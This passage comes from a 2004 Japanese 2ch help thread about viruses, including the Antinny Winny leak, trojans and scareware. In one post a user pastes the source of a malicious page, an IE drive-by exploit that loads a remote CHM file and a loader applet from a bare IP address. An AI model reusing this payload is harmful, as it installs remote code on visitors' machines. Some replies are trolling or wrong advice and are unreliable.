>>672 ちゃんと駆除しとかないとずっと晒されてるぞ。
対処しとけ。
696 :
名無しさん@お腹いっぱい。 :04/09/27 01:43:23
記念カキコ
おまえらw
698 :
名無しさん@お腹いっぱい。 :04/09/27 01:43:25
699 :
名無しさん@お腹いっぱい。 :04/09/27 01:43:45
>>672 自分で対処出来ないようならしばらくネットするな
\ 、 m'''',ヾミ、、 / \、_,r Y Y ' 、 /';,'' 、 ,\ヽ, | | y /、 ,;;,,'', \、\::::::::::/, /,, ;;, ヽ\ o 、 ,o / { ;;;;;;;,, 丿 [ \|:::|/ ] >"''''' <ガリで。 >、.> U <,.< ノ ! ! -=- ノ! ト-、 ..''"L \\.".//_ | ゙` ]
>>672 ありゃ〜。でもイキテくさださーい。
わたしには、それしか言う言葉がありませんです・・・。
つーか、おまいら反応早すぎ。でも、励ましてるからよし。
おやじ、ガリ!
>>672 ヤフーで「exe ファイル 捨てたい」で検索するんだ!
まだyahooのトップページくらいならいいけどさ、 個人情報とかはやばいよな・・・・
しかも相当恥ずかしいヤツを・・・。 何もかも割れてるし、知り合いが見てないことを祈るだけだ。 何回もアップされてたみたいだし、過去の2chの苺きんたまスレで 自分の画像がアップされてるのも見た。 さっきから何も手につかなくて、部屋の中うろうろしてる。 さっきまでお腹がすいていたはずなのに、そんなことどうでも良くなってる。 まるで部屋の中に隠しカメラがあって、トイレからオナニーまで覗かれた気分だ。
,-――――――-.
/ |
/ |
/ |
l"ジェンキン寿司 l
,、_lー-―――――‐--、/l
i ト、ミミ ,r‐- 、``'ニ=‐、.彡リ.
ヾ,iハ゛.´ _,,、_ i.; _,. ` 彡'i)
`、j,' `゚''´:.ノ i::<・ゝ) .ハン
>>702 へいっ!!!がりおまちっ!!!
i, ` ,、/ i_ `` ,r' そろそろ巣に帰るぞ
,r〃'i ,r'ヽ、 _,〉 /.
/i:ト、;;i, ミ=_‐_-, 'i /ヽ__
r-‐'´i::::ハ;;ヾ、‐‐-、 ノ´/i:::'i`i‐- 、_
::i' .l:i 'i::::i ヾ;;`‐---‐'i':/ i、 'i::! i::::i `
:i' i:| !:::l _,r.、;;;;;,r''´ヽi. ll::i i::i l:::'i
なんかネタ臭いな
709 :
名無しさん@お腹いっぱい。 :04/09/27 01:46:44
この調子で感染者の見てる先 いろんなところに爆撃されてます
>>672 お前は本当にすべてを捨てれるんだろうな?
>>707 いいショウガ使ってるねー!
巣に帰るよ。
吐きそう
>>706 ネタ90%
嘘はもうちょっとうまくやろうな。
泣きそう
715 :
名無しさん@お腹いっぱい。 :04/09/27 01:48:31
>>665 それより直したかぁ?
そうでないとここで見てる画像がアップされて二重に祭りになるぞ
自分の名前を見てるスレで発見したところのキャプチャという
笑えない画像がたくさん生み出されてるぞ
嘘だったらどんなに嬉しいか。 変なexeファイルを開いた瞬間に気付くべきだった。 もう外にも出たくない。本当に死にたい。
>>716 下手に騒がなければ一時的なネタとして流れるから安心しる!
>>716 落ち込む気持ちも分かるが
まずは対応しろ
このままだとマズイだろ
>>716 死ぬ気になれば何だって出来るさ
まとめサイト読むなり
ノーd手動でアップデートするなりガンガレ
>>716 変なexe開いた瞬間にPCがあぼーんしなくてよかったな
>>716 個人情報が流れてない限りは早く駆除しとけ
とりあえずShellSystem.exe消して再起動しる
>>714 安心しろ
お前のデスクトップのSSがどれかは分からないが
この2日以内にうpされたのなら確実に保存している
726 :
名無しさん@お腹いっぱい。 :04/09/27 01:53:41
俺と会ってみろ。 お前を救えるかもしれない。
げ、もう3時かよ!
てかこのスレ自演できるじゃねえか
>>716 んで今は何から書き込みしてるの?
対処してないなら書き込んでるSSが晒されたりしちゃうよ
長くいてすいません。 でも、一人になると気が狂いそう。
>>732 もう対処できたと思う。多分。
タスクマネージャーでは、shellsystem.exeがもうないから
>>733 個人情報がどのレベルで漏れたか詳細きぼん
詳細書くと特定されるんじゃね?
なら何も言わず黙ってるしかないな 住所さらされてるヤツよりマシだと思え
まさか創k(ry
そもそも晒されたー って言っておきながら回線切ってない時点で嘘決定。 回線切ったらネタを書き込めないもんな。
>>726 坂田師匠キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
>>726 ガンツキタ━━━━━(゚∀゚)━━━━━!!!
>>665 家族写真と職業住所割れて電話でお知らせと比べてどう?
糞にまみれたーー
>>734 レジストリを高速でスキャンするんだ!!
>>665 俺なんか躁うつ病だけど、躁のときに
自分の写真つきで住所・氏名・電話番号を
ネットのあらゆる所にバラまいて
しかも荒らしたり煽りまくって、webarchiveに今もあるだろうけど
バラまきすぎて対処できなくて諦めてるが生きてるぞ!
いまだにイタ電くるぞ!
キンタマなんか色んな奴がかかってる
すぐにおさまるし大丈夫だ!
今回何人くらいがかかってるんだろう
知らせてくれた人に感謝するんだぞ。 どんな時でも感謝の気持ちを忘れちゃいけない。
明日からは会社でロリファイル落としてたやつらのPC画像がUpされるだろうから もっと悲惨だぞ 下手すると会社クビな上に個人情報晒しまくり
754 :
名無しさん@お腹いっぱい。 :04/09/27 02:16:28
ああ、もう24スレも先が見え始めてきたな。 相変わらず、こんなところに質問書き込んでまともに答えが出るの期待してる奴大杉だな。
>>751 もんのすごい数が感染してる
苺キンタマ監視所スレを途中まで見てたけど
飽きて今はもう見てられないぐらいの数
大人の実況板行ってみ
exe 踏まなきゃ感染しないんでないの? FW で防げるとか
私だって寝てないんだ!
オマイラこのまま1000までいくつもりか?ええ?
759 :
名無しさん@お腹いっぱい。 :04/09/27 02:28:43
FWのことはよくわからないが 通常→シェリーとかいう.exeがネットワークにアクセスしようとしています 許可しますか? というのが出てくるはずで そこで拒否すれば防げると思うのだが どうだろう 間違ってたら教えてくだされ
>>665 お前のSSなんか、きんたま監視所にエロ画像貼りまくったら
興味なくして誰も見なくなる
〜回目っていうのは、その分すべてがアップされてるのでしょうか? それともそのうちの数回分だけ?
>>761 運による うまく送信できればアップされる
763 :
名無しさん@お腹いっぱい。 :04/09/27 05:46:46
失礼します。 ファイル名を指定して実行でregeditと入れると メモ帳が開くんですが、これは金玉に感染しているということですよね…?
ご愁傷様
765 :
名無しさん@お腹いっぱい。 :04/09/27 07:00:59
2chの某スレのリンクを踏んだらパソコン(ウィンドウズ98)の具合が悪くなりました ・インターネットエクスプローラーが開かない ・突然インターネットエクスプローラが開き、エロサイトにつながる ・でも他のページにはいけない ・パソコンから定期的に「ギギガガ・・」という音がしてなにか読み取られてるのか あるいは書き込んでいるのかとても不安 ノートンのライブアップデートを行って調べてみたら Trojan.Adclicker に感染してると結果がでました 削除してねとお願いしたら、ノートンさんは削除できませんでしたと言います ノートンさんのおかげで感染ファイルはわかっているので 手動で削除しようとしたら、このファイルはウィンドウズが使っているので削除できませんと表示されます どうすれば治すことができるのか、わかる方ご指導お願いします
>>765 セーフモードで駆除するだけ
ライブアップデートって事は、全然普段アップデートしてねえのか
自動的にアップデートできるように設定しておくといいよ
あと常駐保護の設定もきちんとやっておけ
768 :
765 :04/09/27 16:09:02
ご指導ありがとうございます セーフモードでは起動できませんでした 何度やっても途中でフリーズしてしまいます 仕方ないので、リカバリーCDをかけてみようと思います
769 :
名無しさん@お腹いっぱい。 :04/09/27 16:40:12
教えてくれよ〜 IE開くと「表示出来ないページ」というのが延々とでてくるんだよ なんなんでしょ???
771 :
Yahoo!メールやばくない? :04/09/27 17:02:21
ここ数日の間に
12608@ t.vodafone.ne.jp
noreply@daitinoaka
webmaster@ wakuwaku21.com
[email protected] の四つのメールアドレスからウイルスの入った添付ファイルが送られて来ました
本文が英語で書いてあり、連絡事項のような内容です
注意してください
772 :
名無しさん@お腹いっぱい。 :04/09/27 17:13:05
pc内のmp3データがどんどん侵食されて再生不能になっていくんですがウイルスなんでしょうか?
773 :
名無しさん@お腹いっぱい。 :04/09/27 17:44:16
わっがんね
775 :
772 :04/09/27 17:56:39
>>774 わかりました。どうもありがとうございます。
>>772 一個だけマジレス
それは「ぬるぽ」です。駆除の仕方はdownload板とかで調べてください。
ny関係はそっち。
_,、、、、、、、,_ n ,riTl|l.il|..ll..|ll.i..lli、 y ril l!|.|l|.l||!.l|.|l|lil.l|l|l 回 や ||l!i!|州l|l|ll||lllミillll|l| 線 め !|||ラ''' '´!|ll||l!lソ|||l|| 切 て 隠 `t'_,,,ヽ i´l州 っ 居 ゙iー '' /i',ノ'゙入 て し `ー'、´ /,r'´ ,>、 ろ ,イy' / /,r ヽ, ,r'// / /,i' ' i ゙、 /,/li,/ ,/,i',i' ,r ,r7' ヽ,i. 〃,//l/ .// ,' /'´ / ハ. /,' / l./ ,i'i l// / / l / ,i ,i ,!/ ,i' l // ,/ ,/ l. ,/ l l i l./ !i .l / _,/ / l! ,r'=‐、_ll_!j'_,_、-‐、‐' __,,. !l. /ノ /´/ ``ヽ、 ` ``''''"´ ,! l /´ ,/-/ `` ``ヽ、、___,, i l / ,.イl / ,.r‐ ``ヽ、,__ ,! ./!l / jly' - '´ i i !.| 〈_/'V |l `'‐‐‐‐‐‐‐‐‐‐‐‐_,,,、、-‐‐'' ! | } ,/ l!',>、 ___,,,、、-―''´―-、、‐' ! | レ'/ / i/l! い、_``ヽ、、______, _,,ノ 〉',/l j/:l!:l ヽ ゙、__ ̄ ̄____,/ `'ー‐'ン'l.l
779 :
名無しさん@お腹いっぱい。 :04/09/27 19:09:21
//www.cty-net.ne.jp/~taitiro/imgboard/data/img20040825044524.jpg これもブラクラですが、踏んでしまったらどうしたらいいですか・・・?
780 :
779 :04/09/27 19:13:59
↑ブラクラじゃねぇ!ウィルスのサイトだった。どうしたらいいですか?
>>779 , -―- 、
/ \
/ /| /| ハ ヽ_
/ / / / // | | | ヽ / /
/ _/ / / |/ |/ v N | | |/ /| / ̄ ̄ ̄ ̄
| ./ / |/TΤ ГTヽ|( (/))| < マルチ
|/レ | 〉 -┘ 、 └- V ~ | | \____
v\ ″ ー ″ イv w N
^ ` ー- ノ ヽ
| | | / / ∧
苺きんたまに感染したらCPU使用率って常に100%なんですか? CPU使用率が10%前後だったら感染してないって思って大丈夫?
>>782 タスクマネージャーで確認しましょうね。
ctrl + alt + del
shellsystem.exeが起動してたら残念賞。
>>783 返答ありがとうございます!
shellsystem.exeはなかったんだけど亜種が心配で…。
>771 今頃何をほざいてお出でですかw
>786 >779の中身はHTMLなので違うと思われ
>>790 うるせえカス。まともな回答もできんクセに。
W32.Randex.genというウィルスをノートン先生が見つけたんですが、 検疫できなかったのでノートン先生の画面に「自動的に削除をお勧めします」 と出てるんですが、感染してるファイルがよりによってmsconfig これ本当に削除していいんですか・・・? ちなみにwinfix3というファイルは見つかってません。誤診でしょうか?
>>794 お前がやれよ
マルチにも答えてやる親切な人なんだろw
ぼるスレでもマルチに答えてたよな。成長しろよ。
>>794 ヒッキーの仕事を取ったら悪いのでやめとく。ほれ、仕事しろ。
797 :
名無しさん@お腹いっぱい。 :04/09/27 22:14:09
OKOKOKOKOKOKh
ttp:// アドレスを貼って移動しようとするとこのように邪魔されるんだけど
これは何ですか?
>>792 削除していいよ
ファイルの修復方法はまた来週ね
ノートン先生が捨てろと言ってるんだから素直に捨てろ!全部捨てろ。
Alt+Ctrl+Deleteが効かないのですが、何かウィルスですか?
それが・・・何故か削除できなかったぽ システムの復元もオフにしてるのになあ
>802 おまいも>86にのっとって環境書いてくれ
一週間ほど前から ノートンファイヤーウォールが 「リモートホストがコンピュータにアクセスしようとしています」という警告が出ます。 リモートアドレスとローカルアドレスが毎回違うので 「常にこの処理を使う」にチェックを入れても効果がありません。 ノートンのビジュアルトラッキングでは 一番最後のドメイン情報は 222.121.184.11と出ていますが これってウィルス?
バスターのオンラインスキャンで TROJ_DIALER.N を検出したんですが バスターに情報は無く、ググっても見当たらないので、ご存知の方いましたら情報お願いします。
なぜか急にいろんなフォルダにdesktop.iniが出来たんですが、 これは何かのウイルスによるものなんですか?
>>805 ただのポートスキャンか、踏み台にされたやつが
トロイをばらまきに来ているだけだろ。
おそらく無問題。
810 :
名無しさん@お腹いっぱい。 :04/09/29 02:05:34
windows起動時にmoleboxというPOPウィンドウが開くのですが・・・ 何かウィルスに感染したのでしょうか? ノートンは反応なしです。
ノートン一昨日定義でダクロリ踏んだらウイルスメールがたくさんきました。 みなさんも気をつけて…
最近質問の仕方がひどいな
>812 禿同。慌ててここに書き込むより状況を整理してからでしょ。順序は大事。
>>812 他のスレもそうだが、わざとやってるとしか思えん。
815 :
名無しさん@お腹いっぱい。 :04/09/29 10:59:34
わざとでしょ
>>815 ここは鑑定スレではありません
てゆうか、やるべきことをまずやってから改めて来てください
818 :
名無しさん@お腹いっぱい。 :04/09/29 11:52:42
なんか Tウイルス に感染したっぽいんだけど・・・ 友達なんて共食いしてるし
>>818 それは大変ですね・・・解決方法は、街を丸ごと爆破するしかないのかもしれません。
やる場合は自己責任でやってね。
解決しました、一応報告までに。 みなさんありがとうございます。
>>815 mailtoのブラクラ。ウイルスが心配ならスキャンすりゃいいだろが。
そんな聞きかたしてくるような奴だからどうせアンチウイルスソフト入れてないんだろうけど
質問させてください。 今日、ノートンが「VBS.loveletter.var」を検出しました。 うちのノートンは更新してないのでトレンドマイクロのオンラインスキャンでスキャンしたところ 感染ファイルは見つかりませんでした。(スキャンの間ノートンは警告出しまくりでしたが。) それで私はノートンが誤反応起こしてるのではないかと思い、 インターネットオプション→一時ファイルの削除、履歴の削除を行いました。 再び、スキャンしてみたところ、ノートンは警告を出しませんでした。 これって結局ウィルスじゃなくてノートンを誤反応起こさせるいたずらですよね?
strangeworldにひっかる奴がまだいることに驚いた
>>822 はい
>>823 レスありがとうございます。
ちなみにloveletter駆除ツールを使っても感染してないって出てたんで
いたずらかなとは思ってたんですが。
>820 治って良かったね。
827 :
名無しさん@お腹いっぱい。 :04/09/29 19:38:44
ウイルスでTROJ_VB.JLってのに感染してるみたいなんですが ウイルスバスターの最新版で検索したら感染ファイルは見つかりません でしたってでるんですけど ウイルスログを見ると隔離できません削除できませんってなってるんですけど これって感染してるんですか?
>>827 感染してると思うよ
アンチウィルスソフトがあるからと言って、そこで安心しちゃった貴方の負け
>>825 VBS.loveletter.varでググッたところそのスレが検索されたのでログはすでに見ました。
>>830 スクリプト実行オフの時は、なんともなかった。
オンの時はDOS窓風の窓が表示されて、
「CDドライブが開いてたら、ウチのスパイウェア検出ソフトを使ってよ」
と宣伝っぽいことが書かれてた。
以下メインの窓に書かれてたこと
IMPORTANT SECURITY NOTICE FROM SPY DELETER!
Is your computer suffering from any of the following symptoms:
1. Has your browser's START PAGE changed?
or 2. Are you seeing a recent increase in annoying POP UPS?
or 3. Have PORN ads appeared in your browser or email?
or 4. Has your computer been acting wierd lately?
or 5. Is your Internet slower or even crashing?
or 6. Do you think your computer may have a virus?
or 7. Have new programs or toolbars been added without your permission?
If your computer is experiencing any of these symptoms...
It is almost certain that "spyware" has taken over your computer,
and the problems will only get worse quickly. Plus your sensitive
information like credit cards and all of your passwords can be
retrieved by criminals all around the world. This is a very scary
problem that needs immediate attention! You NEED to get this fixed now!
Click on THIS LINK FOR IMMEDIATE HELP and your computer will be
back to normal and secure again in just a few minutes.
>ある理由で興奮&焦ってた またロリか
>>832 リンク張るような馬鹿に返答するなよ。
>>830 リンク張るな、ボケ。
おまえ見たいなうっかりさんが踏んだら、更に被害者が出るんだぞ。
そうならリンク張ったおまえが加害者だ。
>827 まずは>86の通りに書け 話はそれからだ
>>835 h抜いてるから問題ないと思われ
直リンするヴァカに関しては同意
>>835 えー、直リンにしてないからいいと思ったんだけどな・・・。
h 抜いても2chブラウザ使ってる人には直リンと何も変わらないんだが・・・
>>839 あー、スマソ
漏れはoperaで2ch(実況を除く)してるヴァカもんなんで、忘れてた。
>>839 俺も2chブラウザ使ってるから、わかるんだけど。
このスレではh抜いても直リンとみなす事にするの?
>>841 俺は直リンでないに一票を投じることにしよう
した方が良いんじゃない? 835はちょっとキツク言い過ぎだけど。
直リンとはいわんとは思うがここは鑑定スレじゃないって話じゃなかったか?
845 :
名無しさん@お腹いっぱい。 :04/09/30 00:09:18
XPホームエディションですが、今日急にウイルスバスターが「DIAL_JAPUP.A」を 何度となくリアルタイム検出するようになりました。 トレンドのHP見てもこのウイルスの情報がありません。 どうやらダイアラーとかいう勝手に回線接続な奴みたいなのですが、 お助けくださいませ。 JPUPD.EXE WNK**.EXE とかいうファイル名でよく検出されます。 XPのSP2らしき自動アップデートを今日やったのですが、これが原因? よろしくお願いします。
ここ見てると、テンプレも読めないヤシらしかウイルス感染してないのが良くわかる。
>>845 なんか「反日的」な名前だなw
バスターのウイルスログの内容はどーなってるのだ?
セーフモードでスキャンした?
848 :
名無しさん@お腹いっぱい。 :04/09/30 01:38:34
>>846 なんかマヌーやっちゃってる?俺・・・
>>847 ありがとう、セーフモードスキャン試してみます。
ログは、\Local\settings\Temporary Internet Files\Content.IE5\ の
下位フォルダにJPUPD*.EXEが、
\Local\settings\temp\ にwnk**.exeが検出され、どれもアクセス拒否処理を
行ったとなってます。
2ちゃんねる見てた時急にメール受信の画面が出てきて、何も操作ができなくなってしまいました。 自分で動かすことができないのに誰かが勝手に動かして受信メールを一個ずつ開いて見られました。 まるでおばけが乗り移ったようでした。なんなんでしょう? これはウイルスですか?ウイルス対策を何もしていない状態だったので可能性はありますよね。
セーフモードスキャンはなぜかバスターが初期化できないと言ってうまくゆかず。 しかしセーフモードからシステムの復旧ができたことに気付いて、 検索とでウイルス見つけて削除、さらにレジストリエディタで関連データ消して 復旧に成功しました。 ついでに紛れ込んでたのも削除。 乙でした。
851 :
名無しさん@お腹いっぱい。 :04/09/30 06:26:03
ネットを開くと、アドレスバーの下に新しく SearchとCorporation 、Internet 、Rights 、Japan 、C 、Copyright 、Reservedっていうのが出ます。 さらにデスクトップの下部に青っぽいタスクバー2本分の大きさの何かが出てきて、 Make MoneyとかMusic、Casinoって書いてあります。 恐くなってNortonで全スキャンしたんですが、何もありませんでした。 直し方教えてください
852 :
名無しさん@お腹いっぱい。 :04/09/30 06:45:56
ありがd!!!
854 :
名無しさん@お腹いっぱい。 :04/09/30 07:52:55
市満のオンラインスキャンってもう苺きんたま検出できる?
>>833 ありがとうございます!
>>834 違います。サッカーのネット中継を早く見たくて「ここで○対○の試合見られるよ」って言うのをつい。
リンクの件はすいませんでした。では、htまで抜けば平気ですか?
以後気をつけます。
856 :
名無しさん@お腹いっぱい。 :04/09/30 09:42:35
オンラインスキャンしたら下記のようなウィルスに感染していたのですが、駆除方法を教えてください。 Virus:Trj/Downloader.GK 駆除不能 C:\Documents and Settings\userID\Local Settings\Temp\THI4A84.tmp\twaintec.cab[polall1t.exe 手動しかないのでしょうか? その場合、このファイルを手動で消しても問題はないのでしょうか?
858 :
名無しさん@お腹いっぱい。 :04/09/30 10:59:30
質問させてください。ウイルスについてですが、例えば苺きんたま であれば「〜.exe」という形になってますよね?それでそのファイル を実行した時、見た目的にはどうなるのでしょうか?ダブルクリック しても何も起こらず「?」と思っているうちに感染しているものなの ですか?それとも何か解凍しているような動きを見せたり、目的の (偽装されている)動画なりグラフィックがきちんと見えたりするの でしょうか?
「?」と思っているうちに大抵感染します。
>858 ものによる 表面上何も起こらない(裏ではきっちり作動している)ものもあるし 偽のエラーダイアログとか出すやつもいる 表向きは普通のアプリケーションで裏で別の動作するのもある
パンダオンラインスキャンしてるけど 先生とBit君は反応なしだったよ やばそうならC:\WINDOWS\system32\ActiveScanを捨てたらいいのかな あとはレジストリが変更されてないか心配なんだが… 他の人はどうなってる?
XPだけど最初のログイン画面でログインすると一瞬壁紙が写って自動的にログアウトしてしまいます。 ノートン入ってますし、別に異常はありませんでした。 お助けお願いします。
864 :
名無しさん@お腹いっぱい。 :04/09/30 14:51:25
ageますね
基本的には
>>865 ハゲドーだけど
初心者は何がわかんないのかすら わかんないってのも事実なんだよね。
だからって許される事ではないけど・・・
って事で質問者はこおテンプレに沿って質問するようにしてチョンマゲ
【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果(ウイルス名・発見場所)】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】
>>865-866 やっぱここに集まる奴は何だかんだ言っていい香具師だな。
865は手厳しいけどちゃんと誘導してあげてるし、866はよりやわらかく教えてあげてるしテンプレまでもう一度貼ってくれて。
うんうん。優しいな。そんなお前らが大好きだよ(´Д⊂グスン
ノートンアンチウイルスが¥1,980
ストリーミング再生中にウィルスを混入させることは可能ですか? 教えてください。
870 :
名無しさん@お腹いっぱい。 :04/09/30 19:04:35
初心者です・・助けてください どうやらウィルスに感染した模様です。 メールに添付されていたファイルを開いたら感染したみたいです。 症状はIEではページが表示できなくなってしまったこととPC起動時の立ち上げに時間がかかるようになったことです。 2chブラウザやヤフーメッセンジャーとかは正常なんです。 最初感染しときに、デスクトップにMS-DOSのショートカット?が作られました。 で、そのショートカットの本体を探したんですが、見当たらず、ウザいのでショートカットは削除しました。 なにかのファイルを埋め込まれたようですが、どうすれば復旧できるでしょうか・・ お願いします
872 :
名無しさん@お腹いっぱい。 :04/09/30 20:05:25
MS04-011_LSASS_EXPLOIT MS03-026_RPC_DCOM_EXPLOIT この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか? 詳しい詳細が解る方、お教えください。 お願いします
873 :
872 :04/09/30 20:14:30
スミマセン書き直します 【使用OS】 WindowsXP SP2 【WindowsUpdateしてるか】 使用していています 【AntiVirusは何を使っているか】 ウイルスバスター2004 【ちゃんとUpdateしてるか】 自動更新です 【スキャンした結果(ウイルス名・発見場所)】 【別のオンラインスキャンしたならその結果は】 大丈夫でした 【症状を具体的に、分かる限りすべて書く】 今のところ被害なし 【何をしたらそんなことになったのか】 ネットに繋げたら頻繁に攻撃してきますが、バスターが ブロックしてくれます。 【これまでにとった措置】 一応、手動ウイルススキャンしました 【その他の質問】MS04-011_LSASS_EXPLOIT MS03-026_RPC_DCOM_EXPLOIT この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか? 詳しい詳細が解る方、お教えください。 お願いします ! どうしたらこの攻撃を回避できるでしょうか?
>>873 バスターのメイン画面→パーソナルファイアーウォール→ネットワークウイルス緊急設定
を見てみ。そこにあるだろう?そこのURLクリックすればトレンドマイクロ
の解説ページに飛ぶから調べてみ。
あと、バスターのパーソナルファイアーウォールを有効にしといてくれ。
設定の仕方は自分で調べてね。
>>873 WindowsUpdateしてるなら気にすることはない。
ネットワーク緊急対策設定→“ネットワーク〜略〜表示する”のチェックをはずす。
チェックをはずしてもPWFが有効ならネットワークウイルスはブロックされているので問題ないよ。
SP2でこの問題が発生してるみたいだね。
不具合満載なもんを自動うp立てしてくんなよなぁ 更新の準備ができました ヽ(`Д´)ノうわーん
878 :
872 :04/09/30 20:57:37
しかし、「質問テンプレつかって質問しなおしてくれ」って言ってるだけ(のつもり) なのに、そのまま消えてしまう香具師って、どういうつもりなんだろう・・・?
>>873 ルーターなどを使わずに直接インターネットへつないでいると
世界中からランダムにブラスター系のネットワークウイルスが飛んでくる
それをウイルスバスターのPFWが検出してブロックした報告がそれ。
報告はブロックした後なので、報告を表示しないようにしてもブロックはちゃんと行われる。
ただ、
>どうしたらこの攻撃を回避できるでしょうか?
というのなら、ルーターを買ってきて繋ぐしかないと思う。
881 :
名無しさん@お腹いっぱい。 :04/09/30 21:26:00
HPがエロサイトになってしまうのですが、 どうしたらよいでしょうか? お願いいたします。
882 :
名無しさん@お腹いっぱい。 :04/09/30 21:29:39
>>881 mk:@MSITStore:C:\spe\start.chm::/start.html#
これになります。
884 :
名無しさん@お腹いっぱい。 :04/09/30 21:51:39
>>880 自分のモデムには一応ルーター機能が付いてるんですけど
市販のルーターでなくても防げるのもなんでしょうか?
886 :
名無しさん@お腹いっぱい。 :04/09/30 22:01:14
昨日からウイルスと格闘してます。 症状は、タスクマネージャーを見ると 5秒毎にcmd.exeが実行されてます。 ノートンでは検出しない、 レジストリでRUN関係のエントリ削除しまくって もだめ(勝手にインストールされたserv_Uは 起動しなくなった)、やけくそでcmd.exe削除 してもだめ(削除してもすぐ復活する)。 いいかげんにくじけそうで、なにかちょっとでも 気づくことがあったら教えて頂たいです。 Windows2000でWinアップデートは最新です
887 :
872 :04/09/30 22:17:08
>>880 >>885 両氏
またまた有難う御座います!
>>880 さん
取り合えずバスターで様子を見ておきます。
それでも酷い様だとルーターを導入してみます。
>>885 さん
SP2だけの問題では無かったのですね。
最近MeからXPにしてSP2にアップロードしましてバスターも入れていたので
安心しきっていました。
でも、昨日まで滅多に攻撃が無かったのに、
今日になってこんなに酷い攻撃の多さなのでちょっとビックリしました。
889 :
名無しさん@お腹いっぱい。 :04/10/01 00:15:18
>>883 無理でした。
またお知恵を拝借いたしたいと思います。
890 :
870 :04/10/01 00:29:41
ちょっと席を外しておりました では失礼をば 【使用OS】win2000 【WindowsUpdateしてるか】してるかどうか忘れました(してないかも) 【AntiVirusは何を使っているか】 ないです・・ 【ちゃんとUpdateしてるか】 【スキャンした結果(ウイルス名・発見場所)】 【別のオンラインスキャンしたならその結果は】 【症状を具体的に、分かる限りすべて書く】 ・強制的にショートカットがデスクトップに作成された(ms-dosなんとかって名前) ・ IEではページが表示できなくなってしまった ・PC起動時の立ち上げに時間がかかるようになった ・2chブラウザやヤフーメッセンジャーとかは正常 【何をしたらそんなことになったのか】 ウィルスメールの添付ファイルを誤って開いてしまった 【これまでにとった措置】強制的に作られたショートカットを削除 【その他の質問】 特になし おながいしまつ
C\windows\sysdllディレクトリってウィルスに感染しないとできませんよね?
894 :
870 :04/10/01 00:47:54
>>892 ありがとうございます
オンラインスキャンしたいんですが、ウィルスのためブラウザが使えないんです。
ページが表示されないんです。
2chブラウザとかは使えるので、ネットには接続されているんですが・・
895 :
名無しさん@お腹いっぱい。 :04/10/01 00:49:27
>>890 セーフモードで起動→オンラインスキャン→手動削除→( ゚Д゚)ウマー だな。
健闘を祈る。
手動削除で自信がなかったらここにまたきなさい。
・怪しいメールはあけない
・アンチウイルスソフトを入れる→無料のもある
>>892 おいっ!
っつーか感謝してるし・・・・・ 禿藁
>>891 うん。download板へ行った方がいいねぇ・・・。
898 :
名無しさん@お腹いっぱい。 :04/10/01 01:56:49
ある結婚相談所が作った出会い系サイトのようなものがあって、そこのホームページを見た日だけ必ずといっていいほど非通知でのワン切り電話が掛かって来ます。これはスパイウエアかハッキングのようなものでしょうか?
899 :
886 :04/10/01 02:01:33
>>888 てめーはマイクロソフトのテクニカルサポートか。
必要な情報は本文中に書いてあるだろボゲェ。
鼻糞以下の脳みその癖にいっちょまえにレスするなや。
>>ヤクザ
手の施しようが無いからフォーマットするよ。。。。
まったく凶悪なウイルス作りやがって
900 :
名無しさん@お腹いっぱい。 :04/10/01 02:11:42
教えてください。アップデートしたXP使っているのですが、
ちょくちょくキーロガーのログファイル(?)がデスクトップ等に現れます。
定義ファイル更新したウィルスバスター2003とspybotでスキャンしても何も見つかりません。
問題のファイルは「}」等の一文字で拡張子もなく、見つけた分だけメモ帳で開いてみると
WINAMPとIEを使用した時のログばかりです。
というか今まさにこのログがデスクトップに現れやがりました。
[02:04:06 10/01/04][ ■2ch BBS .. - Microsoft Internet Explorer]
[
http://www2.2ch.net/2ch.html]ではじまり 、
半角英数の入力分しか記録してないようです。
全角部分はすべて{left}{up}{right}、あとは{Bkp}{Ent}
なにかアドバイスください・・・
901 :
900 :04/10/01 02:12:50
青くさせちゃってすいません・・・
903 :
名無しさん@お腹いっぱい。 :04/10/01 03:14:09
>>886 TROJ_OTORUN.A ?
ウィルスバスターでは検知してくれるけどノートンは知らん。
904 :
名無しさん@お腹いっぱい。 :04/10/01 03:19:39
これをあやまって開いてしまったんですが、私のPCはもう感染してしまったのでしょうか。
ソースを表示してみると、へんなJAVAscriptの記述があったり・・・
h
ttp://213.159.117.133/dl/ms.php <html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'?s-its:mhtml:file://c:\\nosuch.mht!
http://213.159.117.133/dl/ms/x.chm::/x.htm '));
</script>
<applet width=1 height=1 ARCHIVE=loaderms.jar code=Counter></APPLET></body></html>
905 :
名無しさん@お腹いっぱい。 :04/10/01 05:54:59
とあるスレで画像URLをクリックしたら、それはウィルスとスパイウェアを送りつけてくる 悪質なサイトでした・・・ 今のとこ被害はないのですが、セキュリティソフト入れてなかったため、多分感染してると思います パソコンには会社の重要なファイルなどがあるので、消されてしまったりしたらやばいんですけど まあ、それは自分がセキュリティ管理甘かったってのもありますが 被害が出た場合、こういう悪質なリンクを張る2chネラを刑事告訴なりできるのでしょうか? それとも、リンク張る奴はいくら張っても何も対処されないままなのでしょうか? よろしくおねがいします
>>905 罰せられないこともないと思いますが
それは経済的損失がでないともちろんできません。
よっぽどのときは告訴すれば大丈夫です。
けれど2ちゃんねるは「転んでも泣かない」精神が必要なのでまずは対策からしっかりやらないと。
※告訴されるかもしれないからHDDをぶっとばすようなウイルスへのリンクを張る奴はそうそういません。
できれば仕事用のパソコンとネットなどをする用のパソコンで分ければいいと思います。
重要な書類が消えるってのはバックアップとればなんとかなります。
情報を流出する可能性のあるウイルスなどのためにもそうしたほうがいいです。
情報が流出した場合にはあなたに責任が降りかかってくるかもしれませんから。
nycopを思い出すなぁ・・・
908 :
905 :04/10/01 07:52:11
>>905 重要なデータの入っているPCで2chに貼られているリンクをホイホイ
踏むあなたのセキュリティホールを埋める方が重要。
セキュリティソフト入れていても、新種亜種には無力です。
セキュリティを強化しても、中の人がざるなら意味無し。
910 :
870 :04/10/01 10:09:31
>>895 オンラインスキャンのサイトに書いてあるとおりに
レジストリやらいじってみたら、たぶん直ったみたいです!
ありがd!
勉強になりますた!
914 :
